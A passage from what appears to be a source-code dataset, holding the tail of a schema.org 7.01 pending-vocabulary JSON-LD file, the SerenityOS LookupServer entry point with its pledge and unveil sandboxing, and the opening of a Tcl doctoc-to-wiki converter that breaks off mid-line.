"rdfs:subClassOf": { "@id": "http://schema.org/Review" } }, { "@id": "http://schema.org/numberOfFullBathrooms", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2373" }, "http://schema.org/category": "issue-2373", "http://schema.org/domainIncludes": [ { "@id": "http://schema.org/Accommodation" }, { "@id": "http://schema.org/FloorPlan" } ], "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Number" }, "rdfs:comment": "Number of full bathrooms - The total number of full and ¾ bathrooms in an <a class=\"localLink\" href=\"http://schema.org/Accommodation\">Accommodation</a>. This corresponds to the <a href=\"https://ddwiki.reso.org/display/DDW17/BathroomsFull+Field\">BathroomsFull field in RESO</a>.", "rdfs:label": "numberOfFullBathrooms" }, { "@id": "http://schema.org/byMonthDay", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1457" }, "http://schema.org/category": "issue-1457", "http://schema.org/domainIncludes": { "@id": "http://schema.org/Schedule" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Integer" }, "rdfs:comment": "Defines the day(s) of the month on which a recurring <a class=\"localLink\" href=\"http://schema.org/Event\">Event</a> takes place. Specified as an <a class=\"localLink\" href=\"http://schema.org/Integer\">Integer</a> between 1-31.", "rdfs:label": "byMonthDay" }, { "@id": "http://schema.org/speechToTextMarkup", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2108" }, "http://schema.org/category": "issue-2108", "http://schema.org/domainIncludes": { "@id": "http://schema.org/PronounceableText" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Text" }, "rdfs:comment": "Form of markup used. eg. <a href=\"https://www.w3.org/TR/speech-synthesis11\">SSML</a> or <a href=\"https://www.wikidata.org/wiki/Property:P898\">IPA</a>.", "rdfs:label": "speechToTextMarkup" }, { "@id": "http://schema.org/spokenByCharacter", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/271" }, "http://schema.org/category": "issue-271", "http://schema.org/domainIncludes": { "@id": "http://schema.org/Quotation" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/Person" }, { "@id": "http://schema.org/Organization" } ], "rdfs:comment": "The (e.g. fictional) character, Person or Organization to whom the quotation is attributed within the containing CreativeWork.", "rdfs:label": "spokenByCharacter" }, { "@id": "http://schema.org/measuredProperty", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2291" }, "http://schema.org/category": "issue-2291", "http://schema.org/domainIncludes": { "@id": "http://schema.org/Observation" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Property" }, "rdfs:comment": "The measuredProperty of an <a class=\"localLink\" href=\"http://schema.org/Observation\">Observation</a>, either a schema.org property, a property from other RDF-compatible systems e.g. W3C RDF Data Cube, or schema.org extensions such as <a href=\"https://www.gs1.org/voc/?show=properties\">GS1's</a>.", "rdfs:label": "measuredProperty" }, { "@id": "http://schema.org/acquireLicensePage", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2454" }, "http://schema.org/category": "issue-2454", "http://schema.org/domainIncludes": { "@id": "http://schema.org/CreativeWork" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/URL" }, { "@id": "http://schema.org/CreativeWork" } ], "rdfs:comment": "Indicates a page documenting how licenses can be purchased or otherwise acquired, for the current item.", "rdfs:label": "acquireLicensePage", "rdfs:subPropertyOf": { "@id": "http://schema.org/usageInfo" } }, { "@id": "http://schema.org/loanPaymentAmount", "@type": "rdf:Property", "http://purl.org/dc/terms/source": [ { "@id": "https://github.com/schemaorg/schemaorg/issues/1253" }, { "@id": "http://www.w3.org/wiki/WebSchemas/SchemaDotOrgSources#FIBO" } ], "http://schema.org/category": "issue-1253", "http://schema.org/domainIncludes": { "@id": "http://schema.org/RepaymentSpecification" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/MonetaryAmount" }, "rdfs:comment": "The amount of money to pay in a single payment.", "rdfs:label": "loanPaymentAmount" }, { "@id": "http://schema.org/occupationalCredentialAwarded", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2289" }, "http://schema.org/category": "issue-2289", "http://schema.org/domainIncludes": [ { "@id": "http://schema.org/Course" }, { "@id": "http://schema.org/EducationalOccupationalProgram" } ], "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/URL" }, { "@id": "http://schema.org/EducationalOccupationalCredential" }, { "@id": "http://schema.org/Text" } ], "rdfs:comment": "A description of the qualification, award, certificate, diploma or other occupational credential awarded as a consequence of successful completion of this course or program.", "rdfs:label": "occupationalCredentialAwarded" }, { "@id": "http://schema.org/legislationDate", "@type": "rdf:Property", "http://purl.org/dc/terms/source": [ { "@id": "https://github.com/schemaorg/schemaorg/issues/1156" }, { "@id": "http://publications.europa.eu/mdr/eli/index.html" } ], "http://schema.org/category": "issue-1156", "http://schema.org/domainIncludes": { "@id": "http://schema.org/Legislation" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Date" }, "http://www.w3.org/2002/07/owl#equivalentProperty": { "@id": "http://data.europa.eu/eli/ontology#date_document" }, "http://www.w3.org/2004/02/skos/core#exactMatch": { "@id": "http://data.europa.eu/eli/ontology#date_document" }, "rdfs:comment": "The date of adoption or signature of the legislation. This is the date at which the text is officially aknowledged to be a legislation, even though it might not even be published or in force.", "rdfs:label": "legislationDate", "rdfs:subPropertyOf": { "@id": "http://schema.org/dateCreated" } }, { "@id": "http://schema.org/FundingScheme", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": { "@id": "https://www.w3.org/wiki/WebSchemas/SchemaDotOrgSources#FundInfoCollab" }, "http://schema.org/category": "issue-383", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "A FundingScheme combines organizational, project and policy aspects of grant-based funding\n that sets guidelines, principles and mechanisms to support other kinds of projects and activities.\n Funding is typically organized via <a class=\"localLink\" href=\"http://schema.org/Grant\">Grant</a> funding. Examples of funding schemes: Swiss Priority Programmes (SPPs); EU Framework 7 (FP7); Horizon 2020; the NIH-R01 Grant Program; Wellcome institutional strategic support fund. For large scale public sector funding, the management and administration of grant awards is often handled by other, dedicated, organizations - <a class=\"localLink\" href=\"http://schema.org/FundingAgency\">FundingAgency</a>s such as ERC, REA, ...", "rdfs:label": "FundingScheme", "rdfs:subClassOf": { "@id": "http://schema.org/Organization" } }, { "@id": "http://schema.org/SelfCareHealthAspect", "@type": "http://schema.org/HealthAspectEnumeration", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2374" }, "http://schema.org/category": "issue-2374", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "Self care actions or measures that can be taken to sooth, health or avoid a topic. This may be carried at home and can be carried/managed by the person itself.", "rdfs:label": "SelfCareHealthAspect" }, { "@id": "http://schema.org/RepaymentSpecification", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": [ { "@id": "http://www.w3.org/wiki/WebSchemas/SchemaDotOrgSources#FIBO" }, { "@id": "https://github.com/schemaorg/schemaorg/issues/1253" } ], "http://schema.org/category": "issue-1253", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "A structured value representing repayment.", "rdfs:label": "RepaymentSpecification", "rdfs:subClassOf": { "@id": "http://schema.org/StructuredValue" } }, { "@id": "http://schema.org/typicalCreditsPerTerm", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2419" }, "http://schema.org/category": "issue-2419", "http://schema.org/domainIncludes": { "@id": "http://schema.org/EducationalOccupationalProgram" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/StructuredValue" }, { "@id": "http://schema.org/Integer" } ], "rdfs:comment": "The number of credits or units a full-time student would be expected to take in 1 term however 'term' is defined by the institution.", "rdfs:label": "typicalCreditsPerTerm" }, { "@id": "http://schema.org/PartiallyInForce", "@type": "http://schema.org/LegalForceStatus", "http://purl.org/dc/terms/source": [ { "@id": "https://github.com/schemaorg/schemaorg/issues/1156" }, { "@id": "http://publications.europa.eu/mdr/eli/index.html" } ], "http://schema.org/category": "issue-1156", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://www.w3.org/2004/02/skos/core#exactMatch": { "@id": "http://data.europa.eu/eli/ontology#InForce-partiallyInForce" }, "rdfs:comment": "Indicates that parts of the legislation are in force, and parts are not.", "rdfs:label": "PartiallyInForce" }, { "@id": "http://schema.org/DefinedTermSet", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/894" }, "http://schema.org/category": "issue-894", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "A set of defined terms for example a set of categories or a classification scheme, a glossary, dictionary or enumeration.", "rdfs:label": "DefinedTermSet", "rdfs:subClassOf": { "@id": "http://schema.org/CreativeWork" } }, { "@id": "http://schema.org/offersPrescriptionByMail", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1062" }, "http://schema.org/category": "issue-1062", "http://schema.org/domainIncludes": { "@id": "http://schema.org/HealthPlanFormulary" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Boolean" }, "rdfs:comment": "Whether prescriptions can be delivered by mail.", "rdfs:label": "offersPrescriptionByMail" }, { "@id": "http://schema.org/isPlanForApartment", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2373" }, "http://schema.org/category": "issue-2373", "http://schema.org/domainIncludes": { "@id": "http://schema.org/FloorPlan" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Accommodation" }, "rdfs:comment": "Indicates some accommodation that this floor plan describes.", "rdfs:label": "isPlanForApartment" }, { "@id": "http://schema.org/conditionsOfAccess", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2173" }, "http://schema.org/category": "issue-2173", "http://schema.org/domainIncludes": { "@id": "http://schema.org/CreativeWork" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Text" }, "rdfs:comment": "Conditions that affect the availability of, or method(s) of access to, an item. Typically used for real world items such as an <a class=\"localLink\" href=\"http://schema.org/ArchiveComponent\">ArchiveComponent</a> held by an <a class=\"localLink\" href=\"http://schema.org/ArchiveOrganization\">ArchiveOrganization</a>. This property is not suitable for use as a general Web access control mechanism. It is expressed only in natural language.<br/><br/>\n\nFor example \"Available by appointment from the Reading Room\" or \"Accessible only from logged-in accounts \".", "rdfs:label": "conditionsOfAccess" }, { "@id": "http://schema.org/HealthPlanCostSharingSpecification", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1062" }, "http://schema.org/category": "issue-1062", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "A description of costs to the patient under a given network or formulary.", "rdfs:label": "HealthPlanCostSharingSpecification", "rdfs:subClassOf": { "@id": "http://schema.org/Intangible" } }, { "@id": "http://schema.org/accommodationCategory", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2373" }, "http://schema.org/category": "issue-2373", "http://schema.org/domainIncludes": { "@id": "http://schema.org/Accommodation" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Text" }, "rdfs:comment": "Category of an <a class=\"localLink\" href=\"http://schema.org/Accommodation\">Accommodation</a>, following real estate conventions e.g. RESO (see <a href=\"https://ddwiki.reso.org/display/DDW17/PropertySubType+Field\">PropertySubType</a>, and <a href=\"https://ddwiki.reso.org/display/DDW17/PropertyType+Field\">PropertyType</a> fields for suggested values).", "rdfs:label": "accommodationCategory", "rdfs:subPropertyOf": { "@id": "http://schema.org/category" } }, { "@id": "http://schema.org/healthPlanNetworkId", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1062" }, "http://schema.org/category": "issue-1062", "http://schema.org/domainIncludes": [ { "@id": "http://schema.org/HealthPlanNetwork" }, { "@id": "http://schema.org/MedicalOrganization" } ], "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Text" }, "rdfs:comment": "Name or unique ID of network. (Networks are often reused across different insurance plans).", "rdfs:label": "healthPlanNetworkId" }, { "@id": "http://schema.org/applicationDeadline", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2419" }, "http://schema.org/category": "issue-2419", "http://schema.org/domainIncludes": { "@id": "http://schema.org/EducationalOccupationalProgram" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Date" }, "rdfs:comment": "The date at which the program stops collecting applications for the next enrollment cycle.", "rdfs:label": "applicationDeadline" }, { "@id": "http://schema.org/MixedEventAttendanceMode", "@type": "http://schema.org/EventAttendanceModeEnumeration", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1842" }, "http://schema.org/category": "issue-1842", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "MixedEventAttendanceMode - an event that is conducted as a combination of both offline and online modes.", "rdfs:label": "MixedEventAttendanceMode" }, { "@id": "http://schema.org/HealthPlanFormulary", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1062" }, "http://schema.org/category": "issue-1062", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "For a given health insurance plan, the specification for costs and coverage of prescription drugs.", "rdfs:label": "HealthPlanFormulary", "rdfs:subClassOf": { "@id": "http://schema.org/Intangible" } }, { "@id": "http://schema.org/SpecialAnnouncement", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2490" }, "http://schema.org/category": "issue-2490", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "A SpecialAnnouncement combines a simple date-stamped textual information update\n with contextualized Web links and other structured data. It represents an information update made by a\n locally-oriented organization, for example schools, pharmacies, healthcare providers, community groups, police,\n local government.<br/><br/>\n\nThe motivating scenario for SpecialAnnouncement is the <a href=\"https://en.wikipedia.org/wiki/2019%E2%80%9320_coronavirus_pandemic\">Coronavirus pandemic</a>, and the initial vocabulary is oriented to this urgent situation. Schema.org\nexpect to improve the markup iteratively as it is deployed and as feedback emerges from use. In addition to our\nusual <a href=\"https://github.com/schemaorg/schemaorg/issues/2490\">Github entry</a>, feedback comments can also be provided in <a href=\"https://docs.google.com/document/d/1fpdFFxk8s87CWwACs53SGkYv3aafSxz_DTtOQxMrBJQ/edit#\">this document</a>.<br/><br/>\n\nWhile this schema is designed to communicate urgent crisis-related information, it is not the same as an emergency warning technology like <a href=\"https://en.wikipedia.org/wiki/Common_Alerting_Protocol\">CAP</a>, although there may be overlaps. The intent is to cover\nthe kinds of everyday practical information being posted to existing websites during an emergency situation.<br/><br/>\n\nSeveral kinds of information can be provided:<br/><br/>\n\nWe encourage the provision of \"name\", \"text\", \"datePosted\", \"expires\" (if appropriate) and\n\"url\" as a simple baseline. It is important to provide a value for \"category\" where possible, most ideally as a well known\nURL from Wikipedia or Wikidata. In the case of the 2019-2020 Coronavirus pandemic, this should be \"https://en.wikipedia.org/w/index.php?title=2019-20_coronavirus_pandemic\" or \"https://www.wikidata.org/wiki/Q81068910\".<br/><br/>\n\nFor many of the possible properties, values can either be simple links or an inline description, depending on whether a summary is available. For a link, provide just the URL of the appropriate page as the property's value. For an inline description, use a <a class=\"localLink\" href=\"http://schema.org/WebContent\">WebContent</a> type, and provide the url as a property of that, alongside at least a simple \"<a class=\"localLink\" href=\"http://schema.org/text\">text</a>\" summary of the page. It is\nunlikely that a single SpecialAnnouncement will need all of the possible properties simultaneously. More options may be added\nlater if<br/><br/>\n\nWe expect that in many cases the page referenced might contain more specialized structured data, e.g. contact info, <a class=\"localLink\" href=\"http://schema.org/openingHours\">openingHours</a>, <a class=\"localLink\" href=\"http://schema.org/Event\">Event</a>, <a class=\"localLink\" href=\"http://schema.org/FAQPage\">FAQPage</a> etc. By linking to those pages from a <a class=\"localLink\" href=\"http://schema.org/SpecialAnnouncement\">SpecialAnnouncement</a> you can help make it clearer that the events are related to the situation\n(e.g. Coronavirus) indicated by the <a class=\"localLink\" href=\"http://schema.org/category\">category</a> property of the <a class=\"localLink\" href=\"http://schema.org/SpecialAnnouncement\">SpecialAnnouncement</a>.<br/><br/>\n\nThe basic content of <a class=\"localLink\" href=\"http://schema.org/SpecialAnnouncement\">SpecialAnnouncement</a> is similar to that of an <a href=\"https://en.wikipedia.org/wiki/RSS\">RSS</a> or <a href=\"https://en.wikipedia.org/wiki/Atom_(Web_standard)\">Atom</a> feed. For publishers without such feeds, basic feed-like information can be shared by posting\n<a class=\"localLink\" href=\"http://schema.org/SpecialAnnouncement\">SpecialAnnouncement</a> updates in a page, e.g. using JSON-LD. For sites with Atom/RSS functionality, you can point to a feed\nwith the <a class=\"localLink\" href=\"http://schema.org/webFeed\">webFeed</a> property. This can be a simple URL, or an inline <a class=\"localLink\" href=\"http://schema.org/DataFeed\">DataFeed</a> object, with <a class=\"localLink\" href=\"http://schema.org/encodingFormat\">encodingFormat</a> providing\nmedia type information e.g. \"application/rss+xml\" or \"application/atom+xml\".<br/><br/>\n\nFor an announcement that is about a place, you can use <a class=\"localLink\" href=\"http://schema.org/about\">about</a> (or <a class=\"localLink\" href=\"http://schema.org/mainEntity\">mainEntity</a>) to make that relationship explicit.\nFor example, the announcement could be \"about\" a new <a class=\"localLink\" href=\"http://schema.org/CovidTestingFacility\">CovidTestingFacility</a>, and provide contact information, <a class=\"localLink\" href=\"http://schema.org/location\">location</a>, <a class=\"localLink\" href=\"http://schema.org/geo\">geo</a>,\n<a class=\"localLink\" href=\"http://schema.org/openingHours\">openingHours</a> etc.", "rdfs:label": "SpecialAnnouncement", "rdfs:subClassOf": { "@id": "http://schema.org/CreativeWork" } }, { "@id": "http://schema.org/mediaAuthenticityCategory", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2450" }, "http://schema.org/category": "issue-2450", "http://schema.org/domainIncludes": { "@id": "http://schema.org/MediaReview" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/MediaManipulationRatingEnumeration" }, "rdfs:comment": "Indicates a MediaManipulationRatingEnumeration classification of a media object (in the context of how it was published or shared).", "rdfs:label": "mediaAuthenticityCategory" }, { "@id": "http://schema.org/timeOfDay", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2419" }, "http://schema.org/category": "issue-2419", "http://schema.org/domainIncludes": { "@id": "http://schema.org/EducationalOccupationalProgram" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Text" }, "rdfs:comment": "The time of day the program normally runs. For example, \"evenings\".", "rdfs:label": "timeOfDay" }, { "@id": "http://schema.org/termDuration", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2419" }, "http://schema.org/category": "issue-2419", "http://schema.org/domainIncludes": { "@id": "http://schema.org/EducationalOccupationalProgram" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Duration" }, "rdfs:comment": "The amount of time in a term as defined by the institution. A term is a length of time where students take one or more classes. Semesters and quarters are common units for term.", "rdfs:label": "termDuration" }, { "@id": "http://schema.org/newsUpdatesAndGuidelines", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2490" }, "http://schema.org/category": "issue-2490", "http://schema.org/domainIncludes": { "@id": "http://schema.org/SpecialAnnouncement" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/WebContent" }, { "@id": "http://schema.org/URL" } ], "rdfs:comment": "Indicates a page with news updates and guidelines. This could often be (but is not required to be) the main page containing <a class=\"localLink\" href=\"http://schema.org/SpecialAnnouncement\">SpecialAnnouncement</a> markup on a site.", "rdfs:label": "newsUpdatesAndGuidelines" }, { "@id": "http://schema.org/healthPlanCopay", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1062" }, "http://schema.org/category": "issue-1062", "http://schema.org/domainIncludes": { "@id": "http://schema.org/HealthPlanCostSharingSpecification" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/PriceSpecification" }, "rdfs:comment": "Whether The copay amount.", "rdfs:label": "healthPlanCopay" }, { "@id": "http://schema.org/LivingWithHealthAspect", "@type": "http://schema.org/HealthAspectEnumeration", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2374" }, "http://schema.org/category": "issue-2374", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "Information about coping or life related to the topic.", "rdfs:label": "LivingWithHealthAspect" }, { "@id": "http://schema.org/MerchantReturnPolicy", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2288" }, "http://schema.org/category": "issue-2288", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "A MerchantReturnPolicy provides information about product return policies associated with an <a class=\"localLink\" href=\"http://schema.org/Organization\">Organization</a> or <a class=\"localLink\" href=\"http://schema.org/Product\">Product</a>.", "rdfs:label": "MerchantReturnPolicy", "rdfs:subClassOf": { "@id": "http://schema.org/Intangible" } }, { "@id": "http://schema.org/OriginalShippingFees", "@type": "http://schema.org/ReturnFeesEnumeration", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2288" }, "http://schema.org/category": "issue-2288", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "OriginalShippingFees ...", "rdfs:label": "OriginalShippingFees" }, { "@id": "http://schema.org/exceptDate", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1457" }, "http://schema.org/category": "issue-1457", "http://schema.org/domainIncludes": { "@id": "http://schema.org/Schedule" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/Date" }, { "@id": "http://schema.org/DateTime" } ], "rdfs:comment": "Defines a <a class=\"localLink\" href=\"http://schema.org/Date\">Date</a> or <a class=\"localLink\" href=\"http://schema.org/DateTime\">DateTime</a> during which a scheduled <a class=\"localLink\" href=\"http://schema.org/Event\">Event</a> will not take place. The property allows exceptions to\n a <a class=\"localLink\" href=\"http://schema.org/Schedule\">Schedule</a> to be specified. If an exception is specified as a <a class=\"localLink\" href=\"http://schema.org/DateTime\">DateTime</a> then only the event that would have started at that specific date and time\n should be excluded from the schedule. If an exception is specified as a <a class=\"localLink\" href=\"http://schema.org/Date\">Date</a> then any event that is scheduled for that 24 hour period should be\n excluded from the schedule. This allows a whole day to be excluded from the schedule without having to itemise every scheduled event.", "rdfs:label": "exceptDate" }, { "@id": "http://schema.org/populationType", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2291" }, "http://schema.org/category": "issue-2291", "http://schema.org/domainIncludes": { "@id": "http://schema.org/StatisticalPopulation" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Class" }, "rdfs:comment": "Indicates the populationType common to all members of a <a class=\"localLink\" href=\"http://schema.org/StatisticalPopulation\">StatisticalPopulation</a>.", "rdfs:label": "populationType" }, { "@id": "http://schema.org/applicationStartDate", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2419" }, "http://schema.org/category": "issue-2419", "http://schema.org/domainIncludes": { "@id": "http://schema.org/EducationalOccupationalProgram" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Date" }, "rdfs:comment": "The date at which the program begins collecting applications for the next enrollment cycle.", "rdfs:label": "applicationStartDate" }, { "@id": "http://schema.org/loanType", "@type": "rdf:Property", "http://purl.org/dc/terms/source": [ { "@id": "https://github.com/schemaorg/schemaorg/issues/1253" }, { "@id": "http://www.w3.org/wiki/WebSchemas/SchemaDotOrgSources#FIBO" } ], "http://schema.org/category": "issue-1253", "http://schema.org/domainIncludes": { "@id": "http://schema.org/LoanOrCredit" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/URL" }, { "@id": "http://schema.org/Text" } ], "rdfs:comment": "The type of a loan or credit.", "rdfs:label": "loanType" }, { "@id": "http://schema.org/AuthoritativeLegalValue", "@type": "http://schema.org/LegalValueLevel", "http://purl.org/dc/terms/source": [ { "@id": "http://publications.europa.eu/mdr/eli/index.html" }, { "@id": "https://github.com/schemaorg/schemaorg/issues/1156" } ], "http://schema.org/category": "issue-1156", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://www.w3.org/2004/02/skos/core#exactMatch": { "@id": "http://data.europa.eu/eli/ontology#LegalValue-authoritative" }, "rdfs:comment": "Indicates that the publisher gives some special status to the publication of the document. (\"The Queens Printer\" version of a UK Act of Parliament, or the PDF version of a Directive published by the EU Office of Publications). Something \"Authoritative\" is considered to be also <a class=\"localLink\" href=\"http://schema.org/OfficialLegalValue\">OfficialLegalValue</a>\".", "rdfs:label": "AuthoritativeLegalValue" }, { "@id": "http://schema.org/inCodeSet", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/894" }, "http://schema.org/category": "issue-894", "http://schema.org/domainIncludes": { "@id": "http://schema.org/CategoryCode" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/CategoryCodeSet" }, { "@id": "http://schema.org/URL" } ], "rdfs:comment": "A <a class=\"localLink\" href=\"http://schema.org/CategoryCodeSet\">CategoryCodeSet</a> that contains this category code.", "rdfs:label": "inCodeSet", "rdfs:subPropertyOf": { "@id": "http://schema.org/inDefinedTermSet" } } ], "@id": "http://schema.org/#7.01" }
JSONLD
5
whiteslack/schemaorg
data/releases/7.01/ext-pending.jsonld
[ "Apache-2.0" ]
/* * Copyright (c) 2018-2020, Andreas Kling <kling@serenityos.org> * * SPDX-License-Identifier: BSD-2-Clause */ #include "LookupServer.h" #include <LibCore/EventLoop.h> #include <LibCore/LocalServer.h> #include <LibCore/System.h> #include <LibMain/Main.h> ErrorOr<int> serenity_main(Main::Arguments) { TRY(Core::System::pledge("stdio accept unix inet rpath")); Core::EventLoop event_loop; auto server = TRY(LookupServer::LookupServer::try_create()); TRY(Core::System::pledge("stdio accept inet rpath")); TRY(Core::System::unveil("/proc/net/adapters", "r")); TRY(Core::System::unveil("/etc/hosts", "r")); TRY(Core::System::unveil(nullptr, nullptr)); return event_loop.exec(); }
C++
4
r00ster91/serenity
Userland/Services/LookupServer/main.cpp
[ "BSD-2-Clause" ]
# -*- tcl -*- # # $Id: toc.wiki,v 1.6 2005/09/28 04:51:19 andreas_kupries Exp $ # # Engine to convert a doctoc document into Wiki markup. # # Copyright (c) 2003 Andreas Kupries <andreas_kupries@sourceforge.net> # Freely redistributable. # ###################################################################### dt_source _toc_common.tcl ; # Shared code ###################################################################### proc toc_postprocess {wiki} { # Strip empty lines out of the generated wiki source # and trim leading blanks, except in code samples. # set lines [list] foreach line [split $wiki \n] { if {[string match " |*" $line]} { # Verbatim / example lappend lines [string trimright $line] } elseif {[string match ". *" $line]} { # Verbatim / regular lappend lines [string range [string trimright $line] 1 end] } elseif {[string match " \* *" $line]} { # Itemized lists. lappend lines [string map {[ [[ ] ]]} [string trimright $line]] } elseif {[string match " 1. *" $line]} { # Enumerated lists lappend lines [string map {[ [[ ] ]]} [string trimright $line]] } elseif {[regexp "^ (\[^:\]): " $line]} { # Definition list lappend lines [string map {[ [[ ] ]]} [string trimright $line]] } elseif {[string match " *" $line]} { # Unwanted indentation lappend lines [string map {[ [[ ] ]]} 